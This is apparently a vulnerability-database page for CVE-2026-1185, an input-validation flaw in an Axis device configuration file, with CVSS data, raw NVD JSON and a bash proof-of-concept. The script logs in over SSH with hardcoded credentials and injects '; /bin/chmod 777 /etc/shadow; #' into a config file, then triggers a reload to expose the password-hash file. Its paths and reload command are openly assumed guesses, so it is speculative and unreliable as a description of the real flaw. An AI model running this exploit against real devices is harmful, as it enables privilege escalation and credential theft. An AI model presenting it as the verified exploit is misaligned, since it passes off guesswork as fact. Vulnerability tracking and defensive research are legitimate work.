Security Vulnerability Report
CVE-2026-1185 CVSS 5.4 MEDIUM

CVE-2026-1185

Published: 2026-05-12 07:16:10
Last Modified: 2026-05-12 07:16:10

Description

A configuration file on the local file system had improper input validation which could allow code execution and potentially lead to privilege escalation. This vulnerability can only be exploited if an attacker can log in to the Axis device using SSH.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Not explicitly listed in the provided text; refer to the official Axis security advisory.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# PoC for CVE-2026-1185
# Description: Exploits improper input validation in a configuration file
# on an Axis device to achieve code execution and privilege escalation.
# Preconditions: Attacker has valid SSH credentials (low privilege).

TARGET="192.168.1.10"
USER="service"
PASS="password123"
CONFIG_FILE="/etc/axis/vulnerable_config.conf"
PAYLOAD="; /bin/chmod 777 /etc/shadow; #"  # Malicious command to inject

echo "[*] Attempting to exploit CVE-2026-1185 on $TARGET"

# 1. Connect via SSH and inject payload into the configuration file
# We assume the config file is writable by the low-priv user or group
sshpass -p "$PASS" ssh -o StrictHostKeyChecking=no "$USER@$TARGET" \
    "echo 'setting_name=$PAYLOAD' >> $CONFIG_FILE"
if [ $? -eq 0 ]; then
    echo "[+] Payload injected successfully."
else
    echo "[-] Failed to inject payload."
    exit 1
fi

# 2. Trigger configuration reload
# This simulates the system reading the malicious config
# In a real scenario, this might be 'systemctl restart axis-service' or similar
sshpass -p "$PASS" ssh "$USER@$TARGET" "/usr/bin/axis-config-reload"
echo "[*] Waiting for service reload..."
sleep 5

# 3. Verify exploit (Check if shadow file permissions changed)
sshpass -p "$PASS" ssh "$USER@$TARGET" "ls -l /etc/shadow"

echo "[*] Exploit demonstration complete."

References

https://www.axis.com/dam/public/69/df/8d/cve-2026-1185pdf-en-US-530733.pdf (Axis security advisory, as listed in the raw record below)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1185", "sourceIdentifier": "[email protected]", "published": "2026-05-12T07:16:09.720", "lastModified": "2026-05-12T07:16:09.720", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A configuration file on the local file system had improper input validation which could allow code execution and potentially lead to privilege escalation. This vulnerability can only be exploited if an attacker can log in to the Axis device using SSH."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-732"}]}], "references": [{"url": "https://www.axis.com/dam/public/69/df/8d/cve-2026-1185pdf-en-US-530733.pdf", "source": "[email protected]"}]}}